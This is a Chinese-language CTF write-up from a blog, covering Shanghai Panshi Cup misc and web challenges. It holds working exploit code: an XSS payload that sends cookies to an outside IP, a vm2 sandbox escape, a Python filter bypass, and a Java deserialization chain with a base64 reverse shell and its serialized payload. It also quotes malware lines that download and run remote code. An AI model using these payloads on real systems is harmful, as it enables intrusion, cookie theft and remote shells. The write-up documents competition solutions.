上海磐石杯CTF
|
340
|
0
|
WriteUp
|
|
JBNRZ

555 字
|
11 分钟
本文最后更新于 159 天前,其中的信息可能已经有所发展或是发生改变。

Misc

good_http

  • 一个隐水印,得到密码
    • XD8C2VOKEU

complicated_http

  • 冰蝎🐎
    • https://www.google.com/search?sxsrf=APwXEddcuvlnrbjGl_fogdyP-0Qig8RCsw:1684569790306&q=%E5%86%B0%E8%9D%8E+aes+with+magic&spell=1&sa=X&ved=2ahUKEwjE28y_t4P_AhWyh_0HHV-uBrYQBSgAegQIBRAB
  • 解密脚本
<?php
@error_reporting(0);
function Decrypt($data)  
{   
    $key="9d239b100645bd71"; 
    $magicNum=hexdec(substr($key,0,2))%16; 
    $data=substr($data,0,strlen($data)-$magicNum); 
    return openssl_decrypt(base64_decode($data), "AES-128-ECB", $key,OPENSSL_PKCS1_PADDING);  
}
$post=Decrypt("7HJSXpMRP7+UFLe306mY7bibph9lWHtx1iKF7MofJEn2QdI6I5Wj57ZnAhFxAW8sF46EX881N/7ZYMBfcmtXqF36wbZwUpiDIgvghP3TCyp0DdGMWsOQZoLFK6AiStakWhJOGAr77hkyVHCocK/4sNP61e7pin2SXBdjvOA3rPoEKmBdgKFlN74xMy1hLHlwrV3AoYWdodh9zFb91oXD7bv/LdidVjjNrvq9o+R17cAm/wleLy72ZFAsvpvjV5pdgdQSQjvGV2xXqcQUxlyloMHH9d4FBb9Z5gmKTz2k+WBGf8T4t5aSGiQg4vPzHHmWqMrDCu//FWzjK257UEgnO96Z8e1qrj0KeFWP1Yv/4cWKlgjyomfvp5OSm0bTIvC6Zikg4y5yB9fAp6S7gfKsfIpkMWnhoQwKdF77cuT3c/nzcKxC2G28pYSt/jQGe+rgy4Cw02VwFV4K6KI9UB3vhg2oI0rAuhfGjRBRdlVpr2pRa1LbNeeC9xfty+5jmQR8uSyEVaVbVsnnE53Lv2vJMWaWw32Qgf601GWyMTBootuKPPfuhi+d2UL1MFDoQ/D00wQ2sSKiAKsxFJcaBf/13JdvEegggrvV50dI893k/Q9+wWNgUw/D2DgUWKocehRTl2hb+/F0Co6AuwR/wPA8u6qLOuF1u9+YU+5wfQOilCYH4UurDDVpIMjMbY0i+ykjf/yBgXdzTCXrQdmzq/H/+G+ehgWGFFRHgDaIn+291BB3ROrwxiOOlOZd9JC4N5dectJ9WNgaxsCIdI1az92g+uGG8429IPoftNFFhs3clSAwtmKgav9Ef/1D+2/PGiiJ0aKLem//eusIUVkehUnpinMgriZJd5SdUdLtV8+FpIg6kW0XBDeAlp6gcvW9SosLMj8mvXWpV8cwwt/Hb9dzM/ly0/Gs++1eY1Tho1K55YJwwD5QRrHWg4P7MPZzeUM9QaKGkmZanBQcEKh+udXYGMDEDD2+zpdiCdXYw0miJ1gFFvHSHXSBDAbvRWCVEZAc/47Z4tCbheqEruyT5IvWHzu1JpVaPs9gf4rnR76BWF/N/2QJ2fN7fkI9LE/GDChiHB1M2/Y/UT0y35A9nV+e0AsBIQsmakGLiQhieaSzYsnHIBXpvipwGNQ9h46vGN+lM2oF/mYmpbIT/pI6JWpCbGHxoSLb2dsnlFnUC0l2pSkjOmt+010ssS36uIpKfj7g0S7oMTFSDpE2auuA9llpmNbSn+b8SLEx5lFknN5U6xthll91j1tRaJtPJMdwboJaW2DMxyZmedcME3llTHEj1heMCLQUqG7jdso+k3MYTklDmy4WCFFKzzJHCGl7Hl6JzgmRzTMnMlulw55jV2lRqlxSwwwUvXaXaPf64L5cs22USbwb7mN9MIqmXjD+eGf2C8oIhW9Wi7E4rM2Tujd19GmPECoNdNWrhC7DiM550DwMtUHHZIhw7YBnGfZriDelJ106TQgGy+U8cn8Pa4jwHKAyKpdcQ6E/hITXJfdmPHDVaBxJRNOlI1sAqFdZLaTJLHCmPI5SOZmlXikbT59ccFVfRSso4JmrFGb2XiZyvDJBy/uR+Yhlzi+8XOU4JbamiMhSCcYLF0V7qU6p22J9XPIcx6Zc+crW7auAD+jSqQ6spmaRL15OSoZOAh/vklWfAWOjdYwaw2BaPTByIxdC5QtX1Ym2XlENp/gAcA1vkPkLI3fONCEeD54NPKGBIeWf/Q6vcVe+XPcGox8+5cTGo/m1GEKl1cnPtYH/0W+ZSgxiMOej1Q2jKOzwff/xMuiQOgsS1kqikKaQOT1NdpQEl0ppj0a89tyFFQuQZjCjvuDjNADWcHxmPe9n1NrjOELwTsqsf8qyeNrIItinLU0d90x6Q0pAHTY+bgEYCRj8FyteQSrN7aIvdDvCpBPYkFaOt/0gZZiG5r2urkgw3aJQm3tsO8mrN1OhUVYk/1eOUeZ36vSPl6BS85SUISHmnWFuWlCABSqmsAIHEUnrjlPenu0Toc6GUFL17fnedGnDzRPn50tVHGmmWQ2YUJRE+xHmY9UBjha6LVG3xLU2iNcIT5urD/xBHZLArAZgtW/XOfzQE9Dqmfo1yQG7B79WANnBKezvvUgYpE6jMObm9N8ZLZZ+OgjcLV4GiRw9BwoiytrgmRWXZZhAkWJGCo75aES1PLUlaF92gGCOmookcNLlTyc/1AFhSkdJdWj7GdetHwFSYq2+CmQTQGdY9PlG7YmtqSsol2f6kknULLUQt8mXvz3py/DK1nlvCSiKjf7I21cP8l/N/yp3ihCugac98I5+O8FyiNHOH8aLfUTUR5NUMs6tYVLkUZ8jKiAfQQUIVAHbWZ1mbDga/JGVFzUpBgh64z+xu/ZIA/n738VDllR7NkK8eCUaXtnewC42tCb/I3i4oz0YpEWngBpn0insKG5YlCTCl5W+D/RyR6772+DG+3uH7bCxhl1nnBrv5tREdQUXvHZY/yQ/TCXOftOP2yGzghSPQClE2fUqK4Mb3RA30kGjhcx1zBOqYkvYkj5S3olDaAs0/YlATR6FeNlzT1qMY4X2xJCfW+btAyJ91nkmg0DqVnhfdT5dVPfZSQh022dwyAIZonveOG3Ms6LjMQWwpp5waY8CZcYjxK1/bkqzIbSVzCjKd4ALwVi9784lUSRhykGjdoQtyHXFQr51kyoTLJKtDfWeZCaLpr43OFq31M/3kS7PInZdPNk9XCeBs0q6fx6OzRTtiypqluz3MPGlJnMRzeA1LLAM5d2vxGlQSQ661WLiY0BW940Hr5E1sieNc5rkwBgH4346NRgcFQRHiczmayBhHRdBIbrDqeJltQ==.._q..Q.&..9.");
echo $post;
// eval($post);
?>
  • 得到
<?
@error_reporting(0);
function main($content)
{
    $result = array();
    $result["status"] = base64_encode("success");
    $result["msg"] = base64_encode($content);
    @session_start();  //鍒濆鍖杝ession锛岄伩鍏峜onnect涔嬪悗鐩存帴background锛屽悗缁璯etresult鏃犳硶鑾峰彇cookie

    echo encrypt(json_encode($result));
}

function Encrypt($data)
{
    $key="9d239b100645bd71"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
    $encrypted=base64_encode(openssl_encrypt($data, "AES-128-ECB", $key,OPENSSL_PKCS1_PADDING));
    $magicNum=hexdec(substr($key,0,2))%16; //根据密钥动态确定魔法尾巴的长度
    for($i=0;$i<$magicNum;$i++) {
        $encrypted=$encrypted.chr(mt_rand(0, 255)); //拼接魔法尾巴
    }
    return $encrypted;
}
$content="bFJST0hFU1hobFVQUzRRS0xHellTUW5oNUVQdTFTeU5lSDNzMjFtVnFjeGpuYjMzOWJDUDVjcUZiNFpRQlRBb25uWlNjSGtXUW1Ha3RyNXFRREg5WUl3aTh3M1JXUFRLRUVaanlHVDdMaTh2VXplMkFLSHpxT1lVczU1SVZ4MnpobGZSaGNQUDR5VVVGN1JmSEpTa0ZPMHF5T1FtZnMxWGVGQ2tNVzhHaG9FVGNWemx0dWk4S2oxNG1mcWxUakNrcFJENEh2ZHlQTHVvd1lzV0NoSzhNcGVHaGZ2bW9tQTJ5NE9BMnozSzZoTmVvc01Bb2EwN0d3TVo5ZjNHcE1jQU82U2NXcENFNkpLbDl2VjJjclI2ZFlnRnI5ZzdFTHdvYlNqSGFZeUdtWERqU3hPdkhIUVIydDdVZjJVbUV0aXFTajhWSHNZZXdJUlQ2cXlMbmc3UzI4SEZZVVlDZjBoZlZrdWRMa0ljSWgyc0lVQmtMZGprZ2pRTEZuN3ZHWm5SNjBWVzdIdnhhU3RWSFRaYVRCV29sY1NIRVV5a2ZvYjZlUGoyTXpGaGhLRGYwZ2RIeTdkTFE3WnVvZ2hJM0NyTnBvaGNKYU1BVXF5d1dyZXFTc2JvSUVsdmdUaUYxOHJuV1NDcnFZRnBiaENCMmUyeXVFb2R5aGt6QUhXQVF6VWw0Y1lpZDlJM0FxRXJxRWRxV29VbnQ0QkJVZ1A4eUlKaGpGQzlqQ2NpRE1mV2xlcGNlZkt6blNpWDNWeTFObE1vTnpsbFRwMnpFQ2plREtwSTJDSHZWaDFYT1RLb0lmVDE0bkJCSUFGQjRtYlFaWG0yYVdCQVp2WGpiQUJpS3dWbTBvVVZYTlk1NnZ6NnJCR2wyQzFUT0QwRGdTYUtObzBjMW4xS2ZYWVhRZW9BbTBMNFVVZnN1YnU4VGxSWG5oR2F4Qk45aldaenpONXdVTkN3cUxXaWdLdVVKU1ZWaGlvdElVR0dGaExuRUo4clZ5clhVd0xpZkt6RDJNWWs0N1BCbzFUcUJ2NlVGMDRNY3BNWDBGMklHNUtpZEJ0VDMwdm1vVGVTVWJzS1h5akludVNlSm80ajA3b3ZRbnBSZUZ3TVNueVVpYzdiQ2hWUllwdU9oNkR3Nng3bGFuTzVDTTl3ZDZZeEV1WkVLYldrOVNZSTVUYkp0YkJVTkp2OURLUFpScHdJaXlwWDlIR0NLRktORFViUktpcTZkNkUwSVYxNkZsTTlKYXBvdkpQRVNqNWd3R1luU0tLNktuSFZiWGVEcGtWWEJJTDlDczQ2TmtrcmFqMTFNUGdpcXlUSzlXbG5wanNuMVdVbHNYUXFuMGpPNktHYVBRSVEzcWpvTmd3REVITG1panBQZkRDaVo1a052RGRmcHhPd0JHc1dNRlpGMjQ5ZEZOZUE1cDQwS0U2cnh3amxCNkhxa0RpTEZOV0xRankwTDBEbVdUMFJmMUY3VUxWWjExTUppcTM5VFB6eHdJN2hiNjJ1VTRjV09TVldnZ0dmdUFkRTNPaWJEWm9CR3A3YmdSZTMzVk52WXQ5YUxxeVZZZkFZakFFNlNMNzhzV01sbkNHNW5aRU5HT292Zko1NnNHcWhQazZLWDhsQVc1SEl0ZHFBc3RtMkZnRWo4cUtGN21MdGhaS3lSREFRWnhTb1RabzdkbmkxeldIRnY2N2o2ckhLdVM2TGIwazRmY3JxQUg1NzRlWWxhZ25qTjY3dlp0TEdJMzUzVm0yY3ZuNnh5cWxETVFPZmRaVkJlN05SS1p1UFFGZ3B1dm41OWJaUkN6OHVlemEwTFFLNmZmeHY4S09aNG9Qb2l1Rjk3ZkV2eUdhVllOblVURFNzNXpHU1dxclZtRzZDVTU4V0VtZWlEaTF0UE15SE1iYk5hMnVDeUtlcGtHeU0yUHljV3l1OWIzWkFhcmdTakptZ0pSR0g2dXpqOWZhVmI1R3N1Z0FVTGhRQWZnRGdmOWViOGpWenI4SndzMU9QU2g5cVh4bW95NDRDbXVUdXNuZEN4V0RWa2IzV3hNejNJaGIwZkVtaVpXZDROcVZGWVpkYW1iWWdxdmtKRWdXYzdzc1pOQXNlUFNwZE1BaVp3UDBkSHZ4VkwxUjZtWUZtRlI5YmU3Z2pwMjBaaG5yRFNRRkhZUGo2S3ExTDZOUTY5VzRBNEkzZHN1WG9DT2tJeldKNG5xU3FOSFpJUzN3RHV3TERYR29OTmNHSDAyZjBoWGtRb212Y0RYaXlXa2lzVzhRSVJDeFdSQkhnWXFOODNMWW1sZzB3VXNIek9tU2Z6VXJUSVppNGJIaHRHSHZSVHpvOVdwS1R0NW9YamV4Vk1ueXBsRUxYa29uNjVNZlBHZjhuTHFhSXJRMjFIOVlwYWhLU2o2cWUxQ0R6WnR2cEZHUzhRa0t2ckhaalhUTHZ1MVAySTluVlRSWDVWSm1BdHZXRzc0cHZReVZUakdpU0tndmRmdkZZYzFJajNkYk1ieGdrYmYxdjVFaEZNeGlYSDd1c3o0S08xWTIxTzJyNG1YbUN5RldWNTFTdUl1S0FkZzdiMHJmQUp2ZnRxS0c1MUpxNHRYYktKZThHUFlFZ2g0VENmU05JVk1FcnYyYXh6NEExa0lMcGtxRDdaMlZPTHhjSUc2VzdqYkE3OThrWERpU2JpY0pYakFzR3FVN2F1UFRWeEFueXVQblNtV05NTjlpZUxvbmVOWEJ4TXBHQko0cXZNRmdUb3NYczRpSDRqZDhnNWxaQm9ONEVGc3NnRFN6cEhhSWZ5UmxwWkphQVdqYmMyNFd6VmhDWVJBNzhUc0hQbTBtZG5CSFd6M2MxcTlwTXBZaFVxTnUxNkVOYkc0RURBMWMwMEc0QktWeDFYMFUyQnN6dFNmY2JJcnc=";
$content=base64_decode($content);       
main($content);
  • 发现其读取了flag,位于

优雅内存

  • 查看环境变量,KEYS为解密密钥
    • c156e08e123b3dc6399c6c4e55ba2549
  • 更新volatility3后,dump出flag.png.jpg
  • 再次运行hack.exe得到flag.png,扫描二维码得到flag

非常坏的USB

  • 键盘流量,tshark提取
tshark -r usb.pcapng -Y "usbhid.data" -T fields -e usbhid.data > out.txt
  • 脚本还原
normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"  ","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"  ","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
output = []
keys = open('out.txt')

for line in keys:
    print(line)
    # print(line[0:2])
    if line[6:8] == "2d":
        output += "_"
    # if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":
    #     continue
    if line[6:8] in normalKeys.keys():
        output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']
        # else:
        #     output += ['[unknown]']
    print(output)
keys.close()

flag=0
# print("".join(output))
for i in range(len(output)):
    try:
        a=output.index('<DEL>')
        del output[a]
        del output[a-1]
    except:
        pass
for i in range(len(output)):
    try:
        if output[i]=="<CAP>":
            flag+=1
            output.pop(i)
            if flag==2:
                flag=0
        if flag!=0:
            output[i]=output[i].upper()
    except:
        pass
print('output :' + "".join(output))
output :powershell(New_-Object<SPACE>System.Net.WebClient).DownloadFile('https"//github.com/jiayuqi7813/download/releases/download/f/mal.pdf',<SPACE>'C"\word.pdf')cmd<SPACE>/c<SPACE>start<SPACE>C"\word.pdf
  • 下载pdf,上传至在线检测平台,发现存在CVE利用行为
    • https://s.threatbook.com/
  • 建个虚拟机,装个Acrobat Reader,导出hacksun.png
  • 导出secret_info.SettingConetnt-ms时被拒绝导出,通过直接编辑16进制数据改为.png结尾,成功导出文件
    • 注意文件名长度不能变
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>%windir%\system32\cmd.exe /c pow^ers^He^l^l.exe -nO^p -w hid^den -c $I=new-object net.webclient;$key="f38aeb65a88f50a2";$I.proxy=[Net.Webrequest]::GetSystemWebProxy();$key=$key+"373643a82158c6dc";$I.Proxy.Credentials=[Net.CredentialsCache]::DefaultCredentials;IEX $.downloadstring('http://evil.hack/home');
</DeepLink>
      <Icon>%windir%\system32\control.exe</Icon>
    </ApplicationInformation>
    <SettingIdentity>
      <PageID></PageID>
      <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
    </SettingIdentity>
    <SettingInformation>
      <Description>@shell32.dll,-4161</Description>
      <Keywords>@shell32.dll,-4161</Keywords>
    </SettingInformation>
  </SearchableContent>
</PCSettings>
  • 得到key,解加密LSB得到flag

Web

CookieBack

  • hint: 不用关注rt开头的cookie字段
  • xss
</div></pre><img/src=""/onerror=location.href="http://121.4.31.45:443/xss?"+document.cookie><div><pre><div>
  • cookie路由
</div></pre><img/src=""/onerror=location.href="/cookie?data="+document.cookie><div><pre><div>

ezpython

  • 给了运行程序的环境,存在过滤,通过pwnhub的payload直接打
## shell 生成,正常输入payload
shell = f"__import__('os').popen('{input()}').read()"
shell = ','.join([str(ord(i)) for i in shell])
a = f'eval(bytes(({shell})).decode())'
b = list('abcdefghijklmnopqrstuvwxyz')
c = list('abcdefghijklmnopqrstuvwxyz')
assert len(b) == len(c)
for i in range(len(c)):
    a = a.replace(c[i], b[i])
print(a)

easy_node

  • GTG师傅太强了!!!
{"name":"1","properties":"1","code":"const err = new Error();\n  err.name = {\n    toString: new Proxy(() => \"\", {\n      apply(target, thiz, args) {\n        const process = args.constructor.constructor(\"return process\")();\n        throw process.mainModule.require(\"child_process\").execSync(\"curl http://121.4.31.45:443/xss\").toString();\n      },\n    }),\n  };\n  try {\n    err.stack;\n  } catch (stdout) {\n    stdout;\n  }\n"}
  • 要用copyArray绕过 vm2_tester 的检测
  • {“0”:{“0″:[‘vm2_tester’],”length”:”1″},”length”:”1″} 会生成一个嵌套数组 [[‘vm2_tester’]]
{"name":"1","properties":{"0":{"0":["vm2_tester"],"length":"1"},"length":"1"},"code":"const err = new Error();\nerr.name = {\n  toString: new Proxy(() => \"\", {\n    apply(target, thiz, args) {\n      const process = args.constructor.constructor(\"return process\")();\n      throw process.mainModule.require(\"child_process\").execSync(\"ls /;cat /flag\").toString();\n    },\n  }),\n};\ntry {\n  err.stack;\n} catch (stdout) {\n  stdout;\n}"}

fun_java

  • SpringBoot+JDK原生链利用 By Pankas
package org.example;

import com.fasterxml.jackson.databind.node.POJONode;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javassist.*;
import org.apache.commons.codec.binary.Base64;
import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;

public class Exp {

    public static void setValue(Object obj, String name, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static void main(String[] args) throws Exception {

        ClassPool pool = ClassPool.getDefault();
        CtClass ctClass = pool.makeClass("a");
        CtClass superClass = pool.get(AbstractTranslet.class.getName());
        ctClass.setSuperclass(superClass);
        CtConstructor constructor = new CtConstructor(new CtClass[]{},ctClass);
//        constructor.setBody("Runtime.getRuntime().exec(\"calc\");");
        constructor.setBody("Runtime.getRuntime().exec(\"bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzExMi4xMjQuNDQuMjM4LzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}\");");
        ctClass.addConstructor(constructor);
        byte[] bytes = ctClass.toBytecode();
        TemplatesImpl templatesImpl = new TemplatesImpl();
        setFieldValue(templatesImpl, "_bytecodes", new byte[][]{bytes});
        setFieldValue(templatesImpl, "_name", "boogipop");
        setFieldValue(templatesImpl, "_tfactory", null);
        POJONode jsonNodes = new POJONode(templatesImpl);
        BadAttributeValueExpException exp = new BadAttributeValueExpException(null);
        Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
        val.setAccessible(true);
        val.set(exp,jsonNodes);
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(barr);
        objectOutputStream.writeObject(exp);
        objectOutputStream.close();
        String res = Base64.encodeBase64String(barr.toByteArray());
        System.out.println(res);

    }
    private static void setFieldValue(Object obj, String field, Object arg) throws Exception{
        Field f = obj.getClass().getDeclaredField(field);
        f.setAccessible(true);
        f.set(obj, arg);
    }
}
  • payload
rO0ABXNyAC5qYXZheC5tYW5hZ2VtZW50LkJhZEF0dHJpYnV0ZVZhbHVlRXhwRXhjZXB0aW9u1Ofaq2MtRkACAAFMAAN2YWx0ABJMamF2YS9sYW5nL09iamVjdDt4cgATamF2YS5sYW5nLkV4Y2VwdGlvbtD9Hz4aOxzEAgAAeHIAE2phdmEubGFuZy5UaHJvd2FibGXVxjUnOXe4ywMABEwABWNhdXNldAAVTGphdmEvbGFuZy9UaHJvd2FibGU7TAANZGV0YWlsTWVzc2FnZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sACnN0YWNrVHJhY2V0AB5bTGphdmEvbGFuZy9TdGFja1RyYWNlRWxlbWVudDtMABRzdXBwcmVzc2VkRXhjZXB0aW9uc3QAEExqYXZhL3V0aWwvTGlzdDt4cHEAfgAIcHVyAB5bTGphdmEubGFuZy5TdGFja1RyYWNlRWxlbWVudDsCRio8PP0iOQIAAHhwAAAAAXNyABtqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnRhCcWaJjbdhQIABEkACmxpbmVOdW1iZXJMAA5kZWNsYXJpbmdDbGFzc3EAfgAFTAAIZmlsZU5hbWVxAH4ABUwACm1ldGhvZE5hbWVxAH4ABXhwAAAAJHQAD29yZy5leGFtcGxlLkV4cHQACEV4cC5qYXZhdAAEbWFpbnNyACZqYXZhLnV0aWwuQ29sbGVjdGlvbnMkVW5tb2RpZmlhYmxlTGlzdPwPJTG17I4QAgABTAAEbGlzdHEAfgAHeHIALGphdmEudXRpbC5Db2xsZWN0aW9ucyRVbm1vZGlmaWFibGVDb2xsZWN0aW9uGUIAgMte9x4CAAFMAAFjdAAWTGphdmEvdXRpbC9Db2xsZWN0aW9uO3hwc3IAE2phdmEudXRpbC5BcnJheUxpc3R4gdIdmcdhnQMAAUkABHNpemV4cAAAAAB3BAAAAAB4cQB+ABV4c3IALGNvbS5mYXN0ZXJ4bWwuamFja3Nvbi5kYXRhYmluZC5ub2RlLlBPSk9Ob2RlAAAAAAAAAAICAAFMAAZfdmFsdWVxAH4AAXhyAC1jb20uZmFzdGVyeG1sLmphY2tzb24uZGF0YWJpbmQubm9kZS5WYWx1ZU5vZGUAAAAAAAAAAQIAAHhyADBjb20uZmFzdGVyeG1sLmphY2tzb24uZGF0YWJpbmQubm9kZS5CYXNlSnNvbk5vZGUAAAAAAAAAAQIAAHhwc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0/BbqyrMwMACUkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFoAFV91c2VTZXJ2aWNlc01lY2hhbmlzbUwAGV9hY2Nlc3NFeHRlcm5hbFN0eWxlc2hlZXRxAH4ABUwAC19hdXhDbGFzc2VzdAA7TGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0hhc2h0YWJsZTtbAApfYnl0ZWNvZGVzdAADW1tCWwAGX2NsYXNzdAASW0xqYXZhL2xhbmcvQ2xhc3M7TAAFX25hbWVxAH4ABUwAEV9vdXRwdXRQcm9wZXJ0aWVzdAAWTGphdmEvdXRpbC9Qcm9wZXJ0aWVzO3hwAAAAAP////8AdAADYWxscHVyAANbW0JL/RkVZ2fbNwIAAHhwAAAAAXVyAAJbQqzzF/gGCFTgAgAAeHAAAAGzyv66vgAAADMAGAEAAWEHAAEBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0BwADAQAGPGluaXQ+AQADKClWAQAEQ29kZQwABQAGCgAEAAgBABFqYXZhL2xhbmcvUnVudGltZQcACgEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMAAwADQoACwAOAQBhYmFzaCAtYyB7ZWNobyxZbUZ6YUNBdGFTQStKaTlrWlhZdmRHTndMekV4TWk0eE1qUXVORFF1TWpNNEx6RXlNelFnTUQ0bU1RPT19fHtiYXNlNjQsLWR9fHtiYXNoLC1pfQgAEAEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsMABIAEwoACwAUAQAKU291cmNlRmlsZQEABmEuamF2YQAhAAIABAAAAAAAAQABAAUABgABAAcAAAAaAAIAAQAAAA4qtwAJuAAPEhG2ABVXsQAAAAAAAQAWAAAAAgAXcHQACGJvb2dpcG9wcHcBAHg=

easy_log

  • 观察发现日志是 .php结尾的,后端程序会将用户名和密码hash记录在日志中,测试发现用户名这里有waf,可以使用数组来绕过
MISCWEB
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																				
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇 

                    

                    
			        推荐文章
		            

		            

							
DASCTF x GFCTF 2024

							
							

							
DIDCTF 电子数据取证综合平台

							
							

							
红明谷 2024

							
							

							
长城杯 2024

							
							

							
西湖论剑 2024

							
							

							
AliyunCTF 2024

							
							

							
DubheCTF 2024

							
							

							
PyJail

							
							

							
VNCTF 2024

							
							

							
L3HCTF 2024